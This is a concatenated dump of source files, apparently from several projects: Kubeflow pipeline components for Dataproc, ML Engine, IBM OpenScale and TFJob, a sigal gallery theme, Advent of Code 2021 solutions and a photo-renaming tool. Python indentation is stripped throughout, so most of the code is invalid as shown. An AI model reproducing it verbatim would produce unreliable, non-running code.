https://cloud.google.com/dataproc/docs/reference/rest/v1/projects.regions.jobs).
wait_interval (int): The wait seconds between polling the operation.
Defaults to 30s.
Returns:
The created job payload.
Output Files:
$KFP_OUTPUT_PATH/dataproc/job_id.txt: The ID of the created job.
"""
if not pyspark_job:
pyspark_job = {}
if not job:
job = {}
if main_python_file_uri:
pyspark_job['mainPythonFileUri'] = main_python_file_uri
if args:
pyspark_job['args'] = args
job['pysparkJob'] = pyspark_job
return submit_job(project_id, region, cluster_name, job, wait_interval)
```
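A hedged call sketch for `submit_pyspark_job`; every identifier below is a placeholder and the import path is an assumption based on the package layout:
```python
from kfp_component.google.dataproc import submit_pyspark_job  # assumed export path

# Placeholder project, region, cluster, and GCS URIs.
job = submit_pyspark_job(
    project_id='my-project',
    region='us-central1',
    cluster_name='my-cluster',
    main_python_file_uri='gs://my-bucket/jobs/wordcount.py',
    args=['gs://my-bucket/input/', 'gs://my-bucket/output/'],
    wait_interval=30,
)
print(job)
```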
#### File: google/ml_engine/_deploy.py
```python
import logging
import os
from fire import decorators
from google.cloud import storage
from .. import common as gcp_common
from ..storage import parse_blob_path
from ._create_model import create_model
from ._create_version import create_version
from ._set_default_version import set_default_version
KNOWN_MODEL_NAMES = ['saved_model.pb', 'saved_model.pbtext', 'model.pkl']
@decorators.SetParseFns(python_version=str, runtime_version=str)
def deploy(model_uri, project_id, model_id=None, version_id=None,
runtime_version=None, python_version=None, model=None, version=None,
replace_existing_version=False, set_default=False, wait_interval=30):
"""Deploy a model to MLEngine from GCS URI
Args:
model_uri (str): Required, the GCS URI which contains a model file.
If no model file is found, the same path will be treated as an export
base directory of a TF Estimator. The last time-stamped sub-directory
will be chosen as model URI.
project_id (str): required, the ID of the parent project.
model_id (str): optional, the user provided name of the model.
version_id (str): optional, the user provided name of the version.
If it is not provided, the operation uses a random name.
        runtime_version (str): optional, the Cloud ML Engine runtime version
to use for this deployment. If not set, Cloud ML Engine uses
the default stable version, 1.0.
        python_version (str): optional, the version of Python used in prediction.
If not set, the default version is '2.7'. Python '3.5' is available
when runtimeVersion is set to '1.4' and above. Python '2.7' works
with all supported runtime versions.
model (dict): Optional, the JSON payload of the new model. The schema follows
[REST Model resource](https://cloud.google.com/ml-engine/reference/rest/v1/projects.models).
version (dict): Optional, the JSON payload of the new version. The schema follows
the [REST Version resource](https://cloud.google.com/ml-engine/reference/rest/v1/projects.models.versions)
replace_existing_version (boolean): boolean flag indicates whether to replace
existing version in case of conflict.
set_default (boolean): boolean flag indicates whether to set the new
version as default version in the model.
wait_interval (int): the interval to wait for a long running operation.
"""
storage_client = storage.Client()
model_uri = _search_dir_with_model(storage_client, model_uri)
gcp_common.dump_file('/tmp/kfp/output/ml_engine/model_uri.txt',
model_uri)
model = create_model(project_id, model_id, model)
model_name = model.get('name')
version = create_version(model_name, model_uri, version_id,
runtime_version, python_version, version, replace_existing_version,
wait_interval)
if set_default:
version_name = version.get('name')
version = set_default_version(version_name)
return version
def _search_dir_with_model(storage_client, model_root_uri):
bucket_name, blob_name = parse_blob_path(model_root_uri)
bucket = storage_client.bucket(bucket_name)
if not blob_name.endswith('/'):
blob_name += '/'
it = bucket.list_blobs(prefix=blob_name, delimiter='/')
for resource in it:
basename = os.path.basename(resource.name)
if basename in KNOWN_MODEL_NAMES:
logging.info('Found model file under {}.'.format(model_root_uri))
return model_root_uri
model_dir = _search_tf_export_dir_base(storage_client, bucket, blob_name)
if not model_dir:
model_dir = model_root_uri
return model_dir
def _search_tf_export_dir_base(storage_client, bucket, export_dir_base):
logging.info('Searching model under export base dir: {}.'.format(export_dir_base))
it = bucket.list_blobs(prefix=export_dir_base, delimiter='/')
for _ in it.pages:
# Iterate to the last page to get the full prefixes.
pass
timestamped_dirs = []
for sub_dir in it.prefixes:
dir_name = os.path.basename(os.path.normpath(sub_dir))
if dir_name.isdigit():
timestamped_dirs.append(sub_dir)
if not timestamped_dirs:
logging.info('No timestamped sub-directory is found under {}'.format(export_dir_base))
return None
last_timestamped_dir = max(timestamped_dirs)
logging.info('Found timestamped sub-directory: {}.'.format(last_timestamped_dir))
return 'gs://{}/{}'.format(bucket.name, last_timestamped_dir)
```
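A hedged usage sketch for `deploy`; the bucket, project, and version identifiers are invented, and the import path mirrors the one used by the test module below:
```python
from kfp_component.google.ml_engine import deploy  # assumed export, as in the tests below

# Placeholder identifiers for illustration only.
version = deploy(
    model_uri='gs://my-bucket/training/export/',
    project_id='my-gcp-project',
    model_id='census',
    version_id='v1',
    runtime_version='1.14',
    python_version='3.5',
    set_default=True,
)
print(version.get('name'))
```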
#### File: google/ml_engine/test__create_job.py
```python
import mock
import unittest
from googleapiclient import errors
from kfp_component.google.ml_engine import create_job
CREATE_JOB_MODULE = 'kfp_component.google.ml_engine._create_job'
COMMON_OPS_MODEL = 'kfp_component.google.ml_engine._common_ops'
@mock.patch(COMMON_OPS_MODEL + '.display.display')
@mock.patch(COMMON_OPS_MODEL + '.gcp_common.dump_file')
@mock.patch(CREATE_JOB_MODULE + '.KfpExecutionContext')
@mock.patch(CREATE_JOB_MODULE + '.MLEngineClient')
class TestCreateJob(unittest.TestCase):
def test_create_job_succeed(self, mock_mlengine_client,
mock_kfp_context, mock_dump_json, mock_display):
mock_kfp_context().__enter__().context_id.return_value = 'ctx1'
job = {}
returned_job = {
'jobId': 'job_ctx1',
'state': 'SUCCEEDED'
}
mock_mlengine_client().get_job.return_value = (
returned_job)
result = create_job('mock_project', job)
self.assertEqual(returned_job, result)
mock_mlengine_client().create_job.assert_called_with(
project_id = 'mock_project',
job = {
'jobId': 'job_ctx1'
}
)
def test_create_job_with_job_id_prefix_succeed(self, mock_mlengine_client,
mock_kfp_context, mock_dump_json, mock_display):
mock_kfp_context().__enter__().context_id.return_value = 'ctx1'
job = {}
returned_job = {
'jobId': 'mock_job_ctx1',
'state': 'SUCCEEDED'
}
mock_mlengine_client().get_job.return_value = (
returned_job)
result = create_job('mock_project', job, job_id_prefix='mock_job_')
self.assertEqual(returned_job, result)
mock_mlengine_client().create_job.assert_called_with(
project_id = 'mock_project',
job = {
'jobId': 'mock_job_ctx1'
}
)
def test_execute_retry_job_success(self, mock_mlengine_client,
mock_kfp_context, mock_dump_json, mock_display):
mock_kfp_context().__enter__().context_id.return_value = 'ctx1'
job = {}
returned_job = {
'jobId': 'job_ctx1',
'state': 'SUCCEEDED'
}
mock_mlengine_client().create_job.side_effect = errors.HttpError(
resp = mock.Mock(status=409),
content = b'conflict'
)
mock_mlengine_client().get_job.return_value = returned_job
result = create_job('mock_project', job)
self.assertEqual(returned_job, result)
def test_create_job_use_context_id_as_name(self, mock_mlengine_client,
mock_kfp_context, mock_dump_json, mock_display):
context_id = 'ctx1'
job = {}
returned_job = {
'jobId': 'job_ctx1',
'state': 'SUCCEEDED'
}
mock_mlengine_client().get_job.return_value = (
returned_job)
mock_kfp_context().__enter__().context_id.return_value = context_id
create_job('mock_project', job)
mock_mlengine_client().create_job.assert_called_with(
project_id = 'mock_project',
job = {
'jobId': 'job_ctx1'
}
)
def test_execute_conflict_fail(self, mock_mlengine_client,
mock_kfp_context, mock_dump_json, mock_display):
mock_kfp_context().__enter__().context_id.return_value = 'ctx1'
job = {}
returned_job = {
'jobId': 'job_ctx1',
'trainingInput': {
'modelDir': 'test'
},
'state': 'SUCCEEDED'
}
mock_mlengine_client().create_job.side_effect = errors.HttpError(
resp = mock.Mock(status=409),
content = b'conflict'
)
mock_mlengine_client().get_job.return_value = returned_job
with self.assertRaises(errors.HttpError) as context:
create_job('mock_project', job)
self.assertEqual(409, context.exception.resp.status)
def test_execute_create_job_fail(self, mock_mlengine_client,
mock_kfp_context, mock_dump_json, mock_display):
mock_kfp_context().__enter__().context_id.return_value = 'ctx1'
job = {}
mock_mlengine_client().create_job.side_effect = errors.HttpError(
resp = mock.Mock(status=400),
content = b'bad request'
)
with self.assertRaises(errors.HttpError) as context:
create_job('mock_project', job)
self.assertEqual(400, context.exception.resp.status)
def test_execute_job_status_fail(self, mock_mlengine_client,
mock_kfp_context, mock_dump_json, mock_display):
mock_kfp_context().__enter__().context_id.return_value = 'ctx1'
job = {}
returned_job = {
'jobId': 'mock_job',
'trainingInput': {
'modelDir': 'test'
},
'state': 'FAILED'
}
mock_mlengine_client().get_job.return_value = returned_job
with self.assertRaises(RuntimeError):
create_job('mock_project', job)
def test_cancel_succeed(self, mock_mlengine_client,
mock_kfp_context, mock_dump_json, mock_display):
mock_kfp_context().__enter__().context_id.return_value = 'ctx1'
job = {}
returned_job = {
'jobId': 'job_ctx1',
'state': 'SUCCEEDED'
}
mock_mlengine_client().get_job.return_value = (
returned_job)
create_job('mock_project', job)
cancel_func = mock_kfp_context.call_args[1]['on_cancel']
cancel_func()
mock_mlengine_client().cancel_job.assert_called_with(
'mock_project', 'job_ctx1'
)
```
#### File: subscribe/src/subscribe.py
```python
import json
import argparse
import re
from ibm_ai_openscale import APIClient
from ibm_ai_openscale.engines import *
from ibm_ai_openscale.utils import *
from ibm_ai_openscale.supporting_classes import PayloadRecord, Feature
from ibm_ai_openscale.supporting_classes.enums import *
from watson_machine_learning_client import WatsonMachineLearningAPIClient
from minio import Minio
def get_secret_creds(path):
with open(path, 'r') as f:
cred = f.readline().strip('\'')
f.close()
return cred
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--aios_schema', type=str, help='AI OpenScale Schema Name', default="data_mart_credit_risk")
parser.add_argument('--model_name', type=str, help='Deployed model name', default="AIOS Spark German Risk Model - Final")
parser.add_argument('--model_uid', type=str, help='Deployed model uid', default="dummy uid")
parser.add_argument('--label_column', type=str, help='Model label column name', default="Risk")
parser.add_argument('--aios_manifest_path', type=str, help='Object storage file path for the aios manifest file', default="")
parser.add_argument('--bucket_name', type=str, help='Object storage bucket name', default="dummy-bucket-name")
parser.add_argument('--problem_type', type=str, help='Model problem type', default="BINARY_CLASSIFICATION")
args = parser.parse_args()
aios_schema = args.aios_schema
model_name = args.model_name
model_uid = args.model_uid
label_column = args.label_column
aios_manifest_path = args.aios_manifest_path
cos_bucket_name = args.bucket_name
problem_type = args.problem_type
wml_url = get_secret_creds("/app/secrets/wml_url")
wml_instance_id = get_secret_creds("/app/secrets/wml_instance_id")
wml_apikey = get_secret_creds("/app/secrets/wml_apikey")
aios_guid = get_secret_creds("/app/secrets/aios_guid")
cloud_api_key = get_secret_creds("/app/secrets/cloud_api_key")
postgres_uri = get_secret_creds("/app/secrets/postgres_uri")
cos_endpoint = get_secret_creds("/app/secrets/cos_endpoint")
cos_access_key = get_secret_creds("/app/secrets/cos_access_key")
cos_secret_key = get_secret_creds("/app/secrets/cos_secret_key")
    ''' Make sure the http(s) scheme is stripped from the endpoint for Minio '''
url = re.compile(r"https?://")
cos_endpoint = url.sub('', cos_endpoint)
WML_CREDENTIALS = {
"url": wml_url,
"instance_id": wml_instance_id,
"apikey": wml_apikey
}
AIOS_CREDENTIALS = {
"instance_guid": aios_guid,
"apikey": cloud_api_key,
"url": "https://api.aiopenscale.cloud.ibm.com"
}
if postgres_uri == '':
POSTGRES_CREDENTIALS = None
else:
POSTGRES_CREDENTIALS = {
"uri": postgres_uri
}
wml_client = WatsonMachineLearningAPIClient(WML_CREDENTIALS)
ai_client = APIClient(aios_credentials=AIOS_CREDENTIALS)
print('AIOS client version:' + ai_client.version)
''' Setup Postgres SQL and AIOS binding '''
SCHEMA_NAME = aios_schema
try:
data_mart_details = ai_client.data_mart.get_details()
if 'internal_database' in data_mart_details['database_configuration'] and data_mart_details['database_configuration']['internal_database']:
if POSTGRES_CREDENTIALS:
print('Using existing internal datamart')
else:
print('Switching to external datamart')
ai_client.data_mart.delete(force=True)
create_postgres_schema(postgres_credentials=POSTGRES_CREDENTIALS, schema_name=SCHEMA_NAME)
ai_client.data_mart.setup(db_credentials=POSTGRES_CREDENTIALS, schema=SCHEMA_NAME)
else:
print('Using existing external datamart')
except:
if POSTGRES_CREDENTIALS:
print('Setting up internal datamart')
ai_client.data_mart.setup(internal_db=True)
else:
print('Setting up external datamart')
create_postgres_schema(postgres_credentials=POSTGRES_CREDENTIALS, schema_name=SCHEMA_NAME)
ai_client.data_mart.setup(db_credentials=POSTGRES_CREDENTIALS, schema=SCHEMA_NAME)
data_mart_details = ai_client.data_mart.get_details()
binding_uid = ai_client.data_mart.bindings.add('WML instance', WatsonMachineLearningInstance(WML_CREDENTIALS))
if binding_uid is None:
binding_uid = ai_client.data_mart.bindings.get_details()['service_bindings'][0]['metadata']['guid']
bindings_details = ai_client.data_mart.bindings.get_details()
print('\nWML binding ID is ' + binding_uid + '\n')
''' Create subscriptions '''
subscriptions_uids = ai_client.data_mart.subscriptions.get_uids()
for subscription in subscriptions_uids:
sub_name = ai_client.data_mart.subscriptions.get_details(subscription)['entity']['asset']['name']
if sub_name == model_name:
ai_client.data_mart.subscriptions.delete(subscription)
print('Deleted existing subscription for', model_name)
''' Obtain feature and categorical columns '''
# Download aios manifest file
cos = Minio(cos_endpoint,
access_key=cos_access_key,
secret_key=cos_secret_key,
secure=True)
cos.fget_object(cos_bucket_name, aios_manifest_path, aios_manifest_path)
# Extract necessary column names
feature_columns = []
categorical_columns = []
with open(aios_manifest_path) as f:
aios_manifest = json.load(f)
OUTPUT_DATA_SCHEMA = {'fields': aios_manifest['model_schema'], 'type': 'struct'}
for column in aios_manifest['model_schema']:
if column['metadata'].get('modeling_role', '') == 'feature':
feature_columns.append(column['name'])
if column['metadata'].get('measure', '') == 'discrete':
categorical_columns.append(column['name'])
f.close()
PROBLEMTYPE = ProblemType.BINARY_CLASSIFICATION
if problem_type == 'BINARY_CLASSIFICATION':
PROBLEMTYPE = ProblemType.BINARY_CLASSIFICATION
elif problem_type == 'MULTICLASS_CLASSIFICATION':
PROBLEMTYPE = ProblemType.MULTICLASS_CLASSIFICATION
elif problem_type == 'REGRESSION':
PROBLEMTYPE = ProblemType.REGRESSION
subscription = ai_client.data_mart.subscriptions.add(WatsonMachineLearningAsset(
model_uid,
label_column=label_column,
input_data_type=InputDataType.STRUCTURED,
problem_type=PROBLEMTYPE,
prediction_column='predictedLabel',
probability_column='probability',
feature_columns=feature_columns,
categorical_columns=categorical_columns
))
if subscription is None:
print('Exists already')
# subscription already exists; get the existing one
subscriptions_uids = ai_client.data_mart.subscriptions.get_uids()
for sub in subscriptions_uids:
if ai_client.data_mart.subscriptions.get_details(sub)['entity']['asset']['name'] == model_name:
subscription = ai_client.data_mart.subscriptions.get(sub)
subscriptions_uids = ai_client.data_mart.subscriptions.get_uids()
print(subscription.get_details())
''' Scoring the model and make sure the subscriptions are setup properly '''
credit_risk_scoring_endpoint = None
deployment_uid = subscription.get_deployment_uids()[0]
print('\n' + deployment_uid + '\n')
for deployment in wml_client.deployments.get_details()['resources']:
if deployment_uid in deployment['metadata']['guid']:
credit_risk_scoring_endpoint = deployment['entity']['scoring_url']
print('Scoring endpoint is: ' + credit_risk_scoring_endpoint + '\n')
with open("/tmp/model_name", "w") as report:
report.write(model_name)
```
#### File: launcher/src/launch_tf_job.py
```python
import argparse
import datetime
import json
import os
import logging
import requests
import subprocess
import six
import time
import yaml
from py import tf_job_client
from kubernetes import client as k8s_client
from kubernetes import config
def _generate_train_yaml(src_filename, tfjob_ns, workers, pss, trainer_image, command):
"""_generate_train_yaml generates train yaml files based on train.template.yaml"""
with open(src_filename, 'r') as f:
content = yaml.safe_load(f)
content['metadata']['generateName'] = 'trainer-'
content['metadata']['namespace'] = tfjob_ns
if workers and pss:
content['spec']['tfReplicaSpecs']['PS']['replicas'] = pss
content['spec']['tfReplicaSpecs']['PS']['template']['spec']['containers'][0]['image'] = trainer_image
content['spec']['tfReplicaSpecs']['PS']['template']['spec']['containers'][0]['command'] = command
content['spec']['tfReplicaSpecs']['Worker']['replicas'] = workers
content['spec']['tfReplicaSpecs']['Worker']['template']['spec']['containers'][0]['image'] = trainer_image
content['spec']['tfReplicaSpecs']['Worker']['template']['spec']['containers'][0]['command'] = command
content['spec']['tfReplicaSpecs']['MASTER']['template']['spec']['containers'][0]['image'] = trainer_image
content['spec']['tfReplicaSpecs']['MASTER']['template']['spec']['containers'][0]['command'] = command
else:
# If no workers and pss set, default is 1.
master_spec = content['spec']['tfReplicaSpecs']['MASTER']
worker_spec = content['spec']['tfReplicaSpecs']['Worker']
ps_spec = content['spec']['tfReplicaSpecs']['PS']
master_spec['template']['spec']['containers'][0]['image'] = trainer_image
master_spec['template']['spec']['containers'][0]['command'] = command
worker_spec['template']['spec']['containers'][0]['image'] = trainer_image
worker_spec['template']['spec']['containers'][0]['command'] = command
ps_spec['template']['spec']['containers'][0]['image'] = trainer_image
ps_spec['template']['spec']['containers'][0]['command'] = command
return content
def main(argv=None):
parser = argparse.ArgumentParser(description='Kubeflow TFJob launcher')
parser.add_argument('--container-image', type=str,
help='''Container image to run using KubeFlow TFJob. The command line should be added after --.''')
parser.add_argument('--workers', type=int, default=0)
parser.add_argument('--pss', type=int, default=0)
parser.add_argument('--cluster', type=str,
help='GKE cluster set up for kubeflow. If set, zone must be provided. ' +
'If not set, assuming this runs in a GKE container and current ' +
'cluster is used.')
parser.add_argument('--zone', type=str, help='zone of the kubeflow cluster.')
parser.add_argument('--kfversion', type=str,
default='v1alpha2',
help='The version of the deployed kubeflow. ' +
'If not set, the default version is v1alpha2')
parser.add_argument('--tfjob-ns', type=str,
default='default',
                        help='The namespace where the tfjob is submitted. ' +
                             'If not set, the default namespace is default.')
parser.add_argument('--tfjob-timeout-minutes', type=int,
default=10,
help='Time in minutes to wait for the TFJob to complete')
parser.add_argument('--output-dir', type=str)
parser.add_argument('--ui-metadata-type', type=str, default='tensorboard')
import sys
all_args = sys.argv[1:]
separator_idx = all_args.index('--')
launcher_args = all_args[:separator_idx]
remaining_args = all_args[separator_idx + 1:]
args = parser.parse_args(launcher_args)
logging.getLogger().setLevel(logging.INFO)
args_dict = vars(args)
if args.cluster and args.zone:
cluster = args_dict.pop('cluster')
zone = args_dict.pop('zone')
else:
        # Get cluster name and zone from metadata
metadata_server = "http://metadata/computeMetadata/v1/instance/"
metadata_flavor = {'Metadata-Flavor' : 'Google'}
cluster = requests.get(metadata_server + "attributes/cluster-name",
headers = metadata_flavor).text
zone = requests.get(metadata_server + "zone",
headers = metadata_flavor).text.split('/')[-1]
logging.info('Getting credentials for GKE cluster %s.' % cluster)
subprocess.call(['gcloud', 'container', 'clusters', 'get-credentials', cluster,
'--zone', zone])
workers = args_dict.pop('workers')
pss = args_dict.pop('pss')
kf_version = args_dict.pop('kfversion')
tfjob_ns = args_dict.pop('tfjob_ns')
tfjob_timeout_minutes = args_dict.pop('tfjob_timeout_minutes')
trainer_image = args.container_image or os.environ['TRAINER_IMAGE_NAME']
command=remaining_args
logging.info('Generating training template.')
template_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'train.template.yaml')
content_yaml = _generate_train_yaml(template_file, tfjob_ns, workers, pss, trainer_image, command)
logging.info('Start training.')
# Set up handler for k8s clients
config.load_incluster_config()
api_client = k8s_client.ApiClient()
create_response = tf_job_client.create_tf_job(api_client, content_yaml, version=kf_version)
job_name = create_response['metadata']['name']
if args.output_dir:
# Create metadata.json file for visualization.
metadata = {
'outputs' : [{
'type': args.ui_metadata_type,
'source': args.output_dir,
}]
}
with open('/mlpipeline-ui-metadata.json', 'w') as f:
json.dump(metadata, f)
wait_response = tf_job_client.wait_for_job(
api_client, tfjob_ns, job_name, kf_version,
timeout=datetime.timedelta(minutes=tfjob_timeout_minutes))
succ = True
#TODO: update this failure checking after tf-operator has the condition checking function.
if 'Worker' in wait_response['status']['tfReplicaStatuses']:
if 'Failed' in wait_response['status']['tfReplicaStatuses']['Worker']:
logging.error('Training failed since workers failed.')
succ = False
if 'PS' in wait_response['status']['tfReplicaStatuses']:
if 'Failed' in wait_response['status']['tfReplicaStatuses']['PS']:
logging.error('Training failed since PSs failed.')
succ = False
if 'MASTER' in wait_response['status']['tfReplicaStatuses']:
if 'Failed' in wait_response['status']['tfReplicaStatuses']['MASTER']:
logging.error('Training failed since MASTER failed.')
succ = False
#TODO: remove this after kubeflow fixes the wait_for_job issue
# because the wait_for_job returns when the worker finishes but the master might not be complete yet.
if 'MASTER' in wait_response['status']['tfReplicaStatuses'] and 'active' in wait_response['status']['tfReplicaStatuses']['MASTER']:
master_active = True
while master_active:
# Wait for master to finish
time.sleep(2)
wait_response = tf_job_client.wait_for_job(api_client, tfjob_ns, job_name, kf_version,
timeout=datetime.timedelta(minutes=tfjob_timeout_minutes))
if 'active' not in wait_response['status']['tfReplicaStatuses']['MASTER']:
master_active = False
if succ:
logging.info('Training success.')
tf_job_client.delete_tf_job(api_client, tfjob_ns, job_name, version=kf_version)
with open('/output.txt', 'w') as f:
f.write(args.output_dir)
if __name__== "__main__":
main()
```
#### File: kfp/containers/_gcs_helper.py
```python
from pathlib import PurePath
class GCSHelper(object):
""" GCSHelper manages the connection with the GCS storage """
@staticmethod
def get_blob_from_gcs_uri(gcs_path):
"""
Args:
gcs_path (str) : gcs blob path
Returns:
gcs_blob: gcs blob object(https://github.com/googleapis/google-cloud-python/blob/5c9bb42cb3c9250131cfeef6e0bafe8f4b7c139f/storage/google/cloud/storage/blob.py#L105)
"""
from google.cloud import storage
pure_path = PurePath(gcs_path)
gcs_bucket = pure_path.parts[1]
gcs_blob = '/'.join(pure_path.parts[2:])
client = storage.Client()
bucket = client.get_bucket(gcs_bucket)
blob = bucket.blob(gcs_blob)
return blob
@staticmethod
def upload_gcs_file(local_path, gcs_path):
"""
Args:
local_path (str): local file path
gcs_path (str) : gcs blob path
"""
blob = GCSHelper.get_blob_from_gcs_uri(gcs_path)
blob.upload_from_filename(local_path)
@staticmethod
def remove_gcs_blob(gcs_path):
"""
Args:
gcs_path (str) : gcs blob path
"""
blob = GCSHelper.get_blob_from_gcs_uri(gcs_path)
blob.delete()
@staticmethod
def download_gcs_blob(local_path, gcs_path):
"""
Args:
local_path (str): local file path
gcs_path (str) : gcs blob path
"""
blob = GCSHelper.get_blob_from_gcs_uri(gcs_path)
blob.download_to_filename(local_path)
@staticmethod
def create_gcs_bucket_if_not_exist(gcs_bucket):
"""
Args:
gcs_bucket (str) : gcs bucket name
"""
from google.cloud import storage
from google.cloud.exceptions import Conflict
client = storage.Client()
try:
client.create_bucket(gcs_bucket)
except Conflict:
pass
```
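A short usage sketch for `GCSHelper`; bucket and file names are placeholders, and Google Cloud credentials are assumed to be configured:
```python
from kfp.containers._gcs_helper import GCSHelper  # path taken from the file header above

# Placeholder bucket and object paths.
GCSHelper.create_gcs_bucket_if_not_exist('my-staging-bucket')
GCSHelper.upload_gcs_file('model.tar.gz', 'gs://my-staging-bucket/artifacts/model.tar.gz')
GCSHelper.download_gcs_blob('/tmp/model.tar.gz', 'gs://my-staging-bucket/artifacts/model.tar.gz')
GCSHelper.remove_gcs_blob('gs://my-staging-bucket/artifacts/model.tar.gz')
```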
#### File: tests/components/test_python_pipeline_to_graph_component.py
```python
import os
import sys
import unittest
from collections import OrderedDict
from pathlib import Path
import kfp.components as comp
from kfp.components._python_to_graph_component import create_graph_component_spec_from_pipeline_func
class PythonPipelineToGraphComponentTestCase(unittest.TestCase):
def test_handle_creating_graph_component_from_pipeline_that_uses_container_components(self):
test_data_dir = Path(__file__).parent / 'test_data'
producer_op = comp.load_component_from_file(str(test_data_dir / 'component_with_0_inputs_and_2_outputs.component.yaml'))
processor_op = comp.load_component_from_file(str(test_data_dir / 'component_with_2_inputs_and_2_outputs.component.yaml'))
consumer_op = comp.load_component_from_file(str(test_data_dir / 'component_with_2_inputs_and_0_outputs.component.yaml'))
def pipeline1(pipeline_param_1: int):
producer_task = producer_op()
processor_task = processor_op(pipeline_param_1, producer_task.outputs['Output 2'])
consumer_task = consumer_op(processor_task.outputs['Output 1'], processor_task.outputs['Output 2'])
return OrderedDict([ # You can safely return normal dict in python 3.6+
('Pipeline output 1', producer_task.outputs['Output 1']),
('Pipeline output 2', processor_task.outputs['Output 2']),
])
graph_component = create_graph_component_spec_from_pipeline_func(pipeline1)
self.assertEqual(len(graph_component.inputs), 1)
self.assertListEqual([input.name for input in graph_component.inputs], ['pipeline_param_1']) #Relies on human name conversion function stability
self.assertListEqual([output.name for output in graph_component.outputs], ['Pipeline output 1', 'Pipeline output 2'])
self.assertEqual(len(graph_component.implementation.graph.tasks), 3)
def test_create_component_from_real_pipeline_retail_product_stockout_prediction(self):
from .test_data.retail_product_stockout_prediction_pipeline import retail_product_stockout_prediction_pipeline
graph_component = create_graph_component_spec_from_pipeline_func(retail_product_stockout_prediction_pipeline)
import yaml
expected_component_spec_path = str(Path(__file__).parent / 'test_data' / 'retail_product_stockout_prediction_pipeline.component.yaml')
with open(expected_component_spec_path) as f:
expected_dict = yaml.safe_load(f)
self.assertEqual(expected_dict, graph_component.to_dict())
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "153957/153957-theme",
"score": 2
} |
#### File: 153957-theme/153957_theme/theme.py
```python
from pathlib import Path
from sigal import signals
def get_path():
return str(Path(__file__).resolve().parent)
def theme(gallery):
"""Set theme settings to this theme"""
gallery.settings['theme'] = get_path()
def register(settings):
signals.gallery_initialized.connect(theme)
``` |
{
"source": "153957/advent_of_code",
"score": 3
} |
#### File: advent_of_code/aoc2021/day5.py
```python
from .get_inputs import get_inputs
def part1(lines):
encountered_once = set()
encountered_twice = set()
for line in lines:
start, end = line.split(' -> ')
start_x, start_y = [int(point) for point in start.split(',')]
end_x, end_y = [int(point) for point in end.split(',')]
low_x, high_x = sorted([start_x, end_x])
low_y, high_y = sorted([start_y, end_y])
if low_x == high_x:
for y in range(low_y, high_y + 1):
coordinate = (low_x, y)
if coordinate in encountered_once:
encountered_twice.add(coordinate)
encountered_once.add(coordinate)
elif low_y == high_y:
for x in range(low_x, high_x + 1):
coordinate = (x, low_y)
if coordinate in encountered_once:
encountered_twice.add(coordinate)
encountered_once.add(coordinate)
return len(encountered_twice)
def part2(lines):
encountered_once = set()
encountered_twice = set()
for line in lines:
start, end = line.split(' -> ')
start_x, start_y = [int(point) for point in start.split(',')]
end_x, end_y = [int(point) for point in end.split(',')]
low_x, high_x = sorted([start_x, end_x])
low_y, high_y = sorted([start_y, end_y])
if low_x == high_x:
for y in range(low_y, high_y + 1):
coordinate = (low_x, y)
if coordinate in encountered_once:
encountered_twice.add(coordinate)
encountered_once.add(coordinate)
elif low_y == high_y:
for x in range(low_x, high_x + 1):
coordinate = (x, low_y)
if coordinate in encountered_once:
encountered_twice.add(coordinate)
encountered_once.add(coordinate)
elif (high_x - low_x) == (high_y - low_y):
if (
start_x < end_x and start_y < end_y
or start_x > end_x and start_y > end_y
):
for coordinate in zip(range(low_x, high_x + 1), range(low_y, high_y + 1)):
if coordinate in encountered_once:
encountered_twice.add(coordinate)
encountered_once.add(coordinate)
else:
for coordinate in zip(reversed(range(low_x, high_x + 1)), range(low_y, high_y + 1)):
if coordinate in encountered_once:
encountered_twice.add(coordinate)
encountered_once.add(coordinate)
return len(encountered_twice)
if __name__ == '__main__':
lines = get_inputs('day5.txt')
print(part1(lines))
print(part2(lines))
```
#### File: advent_of_code/aoc2021/day7.py
```python
from .get_inputs import get_inputs
def part1(positions):
positions = sorted(int(position) for position in positions[0].split(','))
return min(
sum(abs(position - final_position) for position in positions)
for final_position in range(positions[0], positions[-1])
)
def part2(positions):
positions = sorted(int(position) for position in positions[0].split(','))
return min(
sum(abs(position - final_position) * (abs(position - final_position) + 1) // 2 for position in positions)
for final_position in range(positions[0], positions[-1])
)
if __name__ == '__main__':
positions = get_inputs('day7.txt')
print(part1(positions))
print(part2(positions))
``` |
{
"source": "153957/loci",
"score": 3
} |
#### File: loci/reloci/cli.py
```python
import argparse
import pathlib
from importlib import import_module
from reloci.renamer import Renamer
from reloci.worker import Worker
def get_renamer_class(import_path):
renamer_module, _, renamer_class = import_path.rpartition('.')
module = import_module(renamer_module)
return getattr(module, renamer_class)
def get_parser():
parser = argparse.ArgumentParser(
description='Organise photos into directories based on file metadata'
)
parser.add_argument(
'--move',
action='store_true',
help='move instead of copy files to the new locations, removing them from the source location'
)
parser.add_argument(
'--dryrun',
action='store_true',
help='do not move or copy any files, just show the actions it would take'
)
parser.add_argument(
'--renamer',
type=get_renamer_class,
default=Renamer,
help='provide your own BaseRenamer subclass for custom output paths'
)
parser.add_argument('inputpath', type=pathlib.Path)
parser.add_argument('outputpath', type=pathlib.Path)
return parser
def cli():
parser = get_parser()
kwargs = vars(parser.parse_args())
Worker(**kwargs).do_the_thing()
```
#### File: loci/reloci/planner.py
```python
import collections
import pathlib
from dataclasses import dataclass
from exiftool import ExifTool
from tqdm import tqdm
from reloci.file_info import FileInfo
@dataclass
class Map:
source: pathlib.Path
destination: pathlib.Path
class Planner:
def __init__(self, inputpath, outputpath, renamer):
self.input_root = inputpath
self.output_root = outputpath
self.renamer = renamer()
def get_files(self):
return [
path
for path in self.input_root.rglob('*')
if path.is_file() and not path.is_symlink() and not path.name.startswith('.')
]
def get_output_path(self, input_path, exiftool):
try:
file_info = FileInfo(input_path, exiftool)
return self.output_root / self.renamer.get_output_path(file_info)
except LookupError:
return self.get_output_path_from_counterpart(input_path, exiftool)
def get_output_path_from_counterpart(self, input_path, exiftool):
try:
counterpart_path = next(
path
for path in input_path.parent.rglob(f'{input_path.stem}.*')
if path != input_path
)
except StopIteration:
raise LookupError('Unable to find a counterpart file')
file_info = FileInfo(counterpart_path, exiftool)
file_path = self.renamer.get_output_path(file_info)
return self.output_root / file_path.parent / (file_path.stem + input_path.suffix)
def make_plan(self):
"""Create a mapping to know which input files go where in the output"""
plan = collections.defaultdict(list)
destinations = set()
input_paths = self.get_files()
with ExifTool() as exiftool:
for input_path in tqdm(input_paths, desc='Reading input', dynamic_ncols=True):
